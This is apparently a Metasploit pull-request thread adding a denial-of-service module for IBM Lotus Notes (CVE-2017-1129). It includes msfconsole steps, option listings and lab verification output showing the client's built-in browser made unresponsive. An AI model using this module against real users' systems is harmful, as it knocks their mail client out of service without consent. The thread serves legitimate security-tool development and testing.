IBM Lotus Notes DoS (CVE-2017-1129)

[RootUp]

This module will exploit a vulnerability (CVE-2017-1129) found in some versions of IBM Lotus Notes client, making the application unresponsive and no longer usable.

Verification

• Start msfconsole
• use use auxiliary/dos/http/ibm_lotus_notes
• set SRVHOST <IP of MSF system to act as server>
• set SRVPORT <port of MSF system to act as server>
• run
• in target system's Notes client browser, navigate to the URL given in the output of the previous command
• Verify the Notes client browser becomes unresponsive, making it unusuable
• Document the thing and how it works (Example)

---

Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

[pbarry-r7]

Thanks for your submission, @RootUp! Couple of small things:

• please run msftidy against your module and address style/formatting things it points out (that's exactly what's causing the Travis failures above, like this one)
  • e.g. tools/dev/msftidy.rb modules/auxiliary/dos/ibm_lotus_notes.rb
• please add a markdown (.md) documentation file describing your module and showing a run of it, something like this one

Thanks!

[RootUp]

Vulnerable Application

This module exploits a vulnerability in, inbuilt web-browser of IBM lotus notes, the code uses java-script based URI encoding and create a object instance of encode URI due to the infinite loop it leads to Denial of Service.

Working of Module

1. Start msfconsole
2. use auxiliary/dos/http/ibm_lotus_notes.rb
3. Set SRVHOST
4. Set SRVPORT
5. run (Server started)
6. Visit server URL in web-browser of IBM

msf > use auxiliary/dos/http/ibm_lotus_notes 
msf auxiliary(ibm_lotus_notes) > show options 

Module options (auxiliary/dos/http/ibm_lotus_notes):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) > 
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) > 

Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

Regards
Dhiraj

[RootUp]

@pbarry-r7
Could you please look into it, does it good to go 👍

[pbarry-r7]

Hey @RootUp, thanks for the updates, I'll try to give this a check through in the next day or so here.

Also, my bad on the link I provided above, I should have provided a link that clearly shows the separate markdown (.md) file for documentation, like this one. If you have a chance and wouldn't mind creating a new documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md file and just paste in the markdown you provided in your comment 5 days ago in this PR, that'd be super (and if not, I can do it when I'm looking at this). Thx!

[RootUp]

Hi @pbarry-r7

I have created a new PR 9017, and created a markdown documentation for the same, hope it helps.

Thank you :)

[pbarry-r7]

Nice, thanks, @RootUp! I went ahead and cherry-picked that file into this PR, since they're related.

[pbarry-r7]

Ugh, IBM apparently reviews each trial request for Notes client in order to satisfy US export laws. :/ Waiting on that, will verify once I get the vulnerable SW.

[pbarry-r7]

Verified with IBM Lotus Notes 8.5.2 on Windows 7 Ultimate:

$ ./msfconsole -q
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options

Module options (auxiliary/dos/http/ibm_lotus_notes):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes) > set SRVHOST 10.0.2.4
SRVHOST => 10.0.2.4
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > set URIPATH mypath
URIPATH => mypath
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(ibm_lotus_notes) > 
[*] Using URL: http://10.0.2.4:9092/mypath
[*] Server started.
[*] Sending response

Then started IBM Notes in my Windows Ultimate VM, used Open->Web Browser to get the built-in browser, and pointed it at http://10.0.2.4:9092/mypath. And that did make my IBM Notes client app become unresponsive.

Nice job, @RootUp! Thanks for the contribution. I've a couple very minor tweaks and will land here.

[pbarry-r7]

Release Notes

This module targets versions of the IBM Lotus Notes client application vulnerable to CVE-2017-1129 to create a denial of service.

[RootUp]

Thank you @pbarry-r7 :)